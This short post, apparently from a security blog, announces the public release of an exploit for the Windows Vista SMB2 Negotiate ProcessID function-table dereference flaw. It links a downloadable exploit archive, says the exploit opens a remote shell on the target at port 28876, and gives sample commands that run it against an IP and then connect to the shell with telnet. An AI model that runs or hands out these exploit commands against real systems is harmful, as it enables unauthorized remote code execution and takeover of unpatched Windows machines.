Piotr, who made kon-boot, finally decided to release the Vista smb2 Negotiate ProcessID Function Table Dereference exploit code he’s been sitting on since last fall.
Download: smb2_exploit_release.zip
It should spawn a shell on TARGET_IP on port 28876
Sample usage
————
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876